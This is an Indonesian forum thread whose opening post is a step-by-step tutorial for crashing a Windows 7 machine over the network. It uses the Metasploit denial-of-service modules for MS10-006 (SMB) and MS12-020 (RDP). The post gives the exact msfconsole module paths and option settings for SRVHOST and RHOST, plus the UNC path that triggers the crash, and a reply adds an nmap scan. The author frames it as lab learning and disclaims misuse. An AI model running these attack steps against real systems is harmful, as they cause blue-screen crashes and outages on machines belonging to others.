[Share] Remote Exploit DOS Using Metasploit
#1
Assalamu’alaikum Wr. Wb.




Bismillahirahmanirrahim, di artikel ini saya akan membagi sedikit ilmu tentang remote desktop exploit pada sistem
windows 7. Sistem pada OS windows 7 pada dasarnya memang lemah. Sudah banyak vulnerability yang ditemukan pada sistem ini.
 Anda bisa lihat di http://www.exploit-db.com/.

Ini hanya praktek sederhana saja. Iseng-iseng, saya belum terlalu expert dalam bidang ini sebenarnya,hehehe.

Sebenarnya vulnerability itu apa sih? Vulnerability adalah 
sebuah lubang keamanan dalam software, hardware atau sistem
operasi yang menyediakan sudut potensi untuk menyerang sistem. Kerentanan dapat berupa sesederhana password yang
lemah atau serumit SQL
 Injection. Nah, kita akan menggunakan kode vulnerability ms10-006 (SMB Client) dan
ms12-020 (Windows RDP Service). Info tentang keduanya bisa dilihat di 
https://technet.microsoft.com/en-us/library/security/ms10-006.aspx dan https://technet.microsoft.com/en-us/library/security/ms12-020.aspx.

Lalu, exploit itu apa? Exploit adalah sebuah aksi berupa penyerangan ke sebuah sistem dengan memanfaatkan
celah/vulnerability yang terdapat pada sistem tersebut. Eksploitasi tersebut memberikan payload ke sistem target untuk
memberikan feedback (timbal balik) pada penyerang berupa hak akses sistem target.


Nah, bagaimana dengan payload? Apa itu payload? Payload adalah bagian dari sebuah software yang memungkinkan anda
untuk mengendalikan sistem komputer target untuk dieksploitasi.

Dan untuk info mengenai vulnerability, exploit dan payload anda bisa mengunjungi situs : https://community.rapid7.com/docs/DOC-2248.

Apabila anda ingin belajar Metasploit lebih jauh anda juga bisa mengaksesnya di situs berikut : http://www.metasploit.com/
atau http://www.offensive-security.com/metasploit-unleashed/Main_Page,
di sana sudah ada dokumentasi lengkap tentang metasploit dari mulai cara instalasi sampai ke penggunaannya.

 

Baiklah, langsung saja kita praktikkan!! Adapun Alutsista yang diperlukan adalah;

1. Laptop/PC bersistem linux (khususnya distro untuk security, contoh: Kali Linux, Backtrack, Backbox, DEFT, dll.)
Saya menggunakan Backtrack 5R3.


2. Laptop/PC bersistem windows (terserah mau client apa server). Saya menggunakan Windows 7.

3. Jaringan Internet, Router, dkk.

4. 2 buah kabel UTP (kabel ethernet)

5. Roll terminal listrik (siapa tau nanti ditengah jalan batre laptopnya abis hahaha)

6. White Coffee (sebagai penyejuk pikiran hahaha)

Jadi bagaimana? Anda sudah mempunyai semua alutsista di atas? Kalau belum segera beli dan miliki lah! Cari di
jonggol banyak bro hahaha...


 

Berikut langkah-langkah eksploitasinya;

1. Niat (Bismillahirahmanirrahim. Niatku melakukan eksploitasi ini adalah hanya untuk pembelajaran semata. Aamiin...
Biar dapat berkah bro! Haha)


2. Mental. Kenapa mental? Ini sangat dibutuhkan ketika nanti jika eksploitasi ini gagal atau belum berhasil. Beberapa orang yang melakukan eksploitasi ini gagal dan menyerah.

3. Nyalakan laptop/PC yang untuk attacker maupun laptop/PC yang untuk target. Jangan lupa nyalakan AC juga biar adem
dikit, hahaha. Sambungkan kabel UTP dari router/switch ke semua perangkat yang digunakan.


4. Mode on pertama pada laptop/PC attacker. Buka terminal dan ketikan command : ifconfig

  Catat IP anda pada teks editor.

5. Mode pada laptop/PC target. Buka CMD (Command Prompt) dan ketikan perintah : ipconfig

  Catat IP target pada teks editor.

6. Mode kembali ke laptop/PC attacker. Di terminal ketikan command : msfconsole

7. Lalu, ketikan command : use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop

8. Lalu, ketikan command : show options

  Maka akan tampil seperti ini.
[Image: yU8FPui.png]


9. Kita lihat pada gambar di atas, SRVHOST belum ditentukan, masih 0.0.0.0. Edit SRVHOST-nya dengan mengetikan command : set SRVHOST (Alamat IP anda)
Saya set IP nya ke 192.168.1.16, ketikan kembali command: show options ,maka akan tampil seperti ini. Kita lihat pada kolom SRVHOST sudah terdapat valid IP.


[Image: h2RIOJc.png]


10. Pada kolom SRVPORT sudah terdapat valid port-nya, yaitu port 445 (Windows Share). Kalau mau diganti silakan,
bisa ketikan command : 
set SRVPORT (port)
Pada kasus ini saya merubah port saya menjadi port 80 (HTTP).


[Image: xcFl1IU.png]


11. Setelah itu, buka terminal baru dan ketikan command : msfconsole
12. Lalu, ketikan command : use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
13. Lalu, ketikan command : show options


[Image: zlAaCEu.png]

14.
Kita lihat pada kolom RHOST belum terdapat valid IP, nah kita isikan dengan IP target
yang sudah kita dapat di awal tadi. Ketikan command : 
set RHOST (IP target)
Saya set IP nya ke 192.168.1.17, ketikan kembali command: show options ,maka akan tampil seperti ini. Kita lihat pada kolom RHOST sudah terdapat valid IP.


[Image: aG4u8Qg.png]

Pada kolom RPORT tidak saya ubah, saya biarkan saja seperti itu dengan port 3389 (RDP), info untuk TCP & UDP Port
bisa ke : 
http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers
15. Pindah ke terminal awal dan ketikan command : run / exploit


[Image: t87VD0k.png]

16. 
Sekarang pindah mode ke laptop/PC target. Buka RUN dan ketikan perintah : \\192.168.1.16\Shared\Anything lalu tekan ENTER atau klik OK.


[Image: V0s1oYU.jpg]

17. 
Langsung pindah mode ke laptop/PC attacker, pada terminal ke-2 ketikan command : run / exploit
Ini hasil ketika anda gagal melakukan eksploitasi:


[Image: saVEZD6.png]

Nah, di sini mental anda di uji. Apakah anda menyerah atau masih memiliki semangat untuk terus mencoba hingga
hasilnya 
BERHASIL seperti ini?:


[Image: fU2Mzo3.png]

Dan ketika eksploitasi yang kita lakukan berhasil, maka sistem target akan melakukan reboot / restart otomatis. Dan cobalah cek laptop/PC target, apakah tampilan layarnya berubah seperti ini :



[Image: 7tnfonf.jpg]

Atau malah jadi biru seperti ini:



[Image: akZ5Xwv.png]

Kalau masih hitam sih masih bisa masuk ke sistem lagi, tapi kalo udah jadi biru seperti itu sih namanya BSOD (Blue Screen of Death) nightmare banget di windows ini mah bro hahaha, jarang ada yang bisa balik masuk ke sistem lagi kalo udah ganti jadi biru begitu, harus instal ulang obatnya hahaha...

Misalkan bisa masuk ke sistem windows lagi, biasanya nanti akan muncul pesan error seperti ini:


[Image: vXMCKdt.jpg]

Alhamdulillah, PC yang saya gunakan sebagai target, sistem windowsnya masih bisa kembali, alias masih bernyawa. ^_^



Nah, bagaimana dengan hasil eksploitasi teman-teman? Apakah anda berhasil?
Tentunya sangat senang jika langsung berhasil ^_^ tapi bagi yang belum berhasil jangan mudah menyerah ya,
coba terus sampai bisa. Cari solusinya di mbah gugel ^_^

File PDF bisa diunduh di RDP_WIN7.


Demikian sedikit ilmu dari saya, semoga bisa bermanfaat bagi anda semua. Tapi, jangan disalahgunakan ya,
saya tidak bertanggungjawab apabila anda mempraktikan tutorial ini untuk tindak kejahatan. Risiko anda tanggung sendiri!!

Kalau bisa, share hasil eksploitasinya ke saya ya ^_^ keep trying!! Revisi untuk tutorial ini akan saya terima dengan senang
hati, silakan tuliskan kritik dan saran pada kolom reply di bawah...

Saya mohon maaf apabila dalam tutorial ini bahasa atau metode saya sulit dimengerti, tidak menggunakan spoiler (menyusul) dan apabila ada kata-kata yang salah/kurang berkenan, saya mohon maaf.
Syukron Ya Allah Ya Rabbi Ya Rahman Ya Rahim, terima kasih untuk rekan-rekan saya Teddy Haryanto, Sidik Nugroho, Asep Maulana Hasanudin, dan Aris Budiarto.
Terima kasih juga untuk Laptop+PC kesayangan saya serta OS yang saya gunakan, Backtrack dan Windows.

 
--==00==--
 
Wassalamu’alaikum Wr. Wb.
"Die ruhigeren man wird, desto mehr werden Sie in der Lage sind zu hören"

Quote:- No matter how great I'm, I'm still a disciple. -


#2
Mohon maaf teman-teman sekalian, fitur spoiler-nya menyusul ya. {damai} ^_^
"Die ruhigeren man wird, desto mehr werden Sie in der Lage sind zu hören"

Quote:- No matter how great I'm, I'm still a disciple. -


#3
Mantab,om.
Ijin nyimak dulu dah.
Sambil dipelajari, Smile







#4
(01-14-2015, 01:26 PM)Devonz Wrote: Mantab,om.
Ijin nyimak dulu dah.
Sambil dipelajari, Smile

silakan om. semoga berhasil yak Big Grin
selamat belajar!!
"Die ruhigeren man wird, desto mehr werden Sie in der Lage sind zu hören"

Quote:- No matter how great I'm, I'm still a disciple. -


#5
di thread kalo bisa dikasih list hasil information gathering, mungkin bisa pake Nmap supaya jelas kondisi target yg bisa di exploit seperti apa.
soalnya disini kondisi target harus open port 3389 (Remote Desktop), port 445 (SMB) atau port (HTTP).
jadi teman2 disini gak asal main tembak..hehehe

tapi udah keren om tutornya
+1 dari saya Smile

#6
(01-15-2015, 10:38 PM)mitchell Wrote: di thread kalo bisa dikasih list hasil information gathering, mungkin bisa pake Nmap supaya jelas kondisi target yg bisa di exploit seperti apa.
soalnya disini kondisi target harus open port 3389 (Remote Desktop), port 445 (SMB) atau port (HTTP).
jadi teman2 disini gak asal main tembak..hehehe

tapi udah keren om tutornya
+1 dari saya Smile

Sebelumnya terima kasih om @mitchell Smile
Untuk masalah port yang digunakan itu secara default yang diSRVHOST itu 445 dan yang RHOST adalah 3389. Nah port 80 itu cuma karna saya pengen coba saja pakai port yang lain. Begitu.
Untuk melihat port yang terbuka pada perangkat target saya pakai : nmap (IP_target) Smile
kalau mau pakai port yang lain silakan dicoba saja om.
"Die ruhigeren man wird, desto mehr werden Sie in der Lage sind zu hören"

Quote:- No matter how great I'm, I'm still a disciple. -


#7
sebaiknya namanya remote dos exploit, karena hanya mengakibatkan os target out of service (tidak dapat digunakan), sedangkan remote exploit itu biasanya remote access.
btw nice thread, +1 dari saya Big Grin

#8
(01-21-2015, 05:32 AM)iKONspirasi Wrote: sebaiknya namanya remote dos exploit, karena hanya mengakibatkan os target out of service (tidak dapat digunakan), sedangkan remote exploit itu biasanya remote access.
btw nice thread, +1 dari saya Big Grin

siap om @iKONspirasi Big Grin judul sudah saya ganti.
terima kasih untuk koreksinya..
dan untuk +1 nya juga Big Grin
"Die ruhigeren man wird, desto mehr werden Sie in der Lage sind zu hören"

Quote:- No matter how great I'm, I'm still a disciple. -







Users browsing this thread: 1 Guest(s)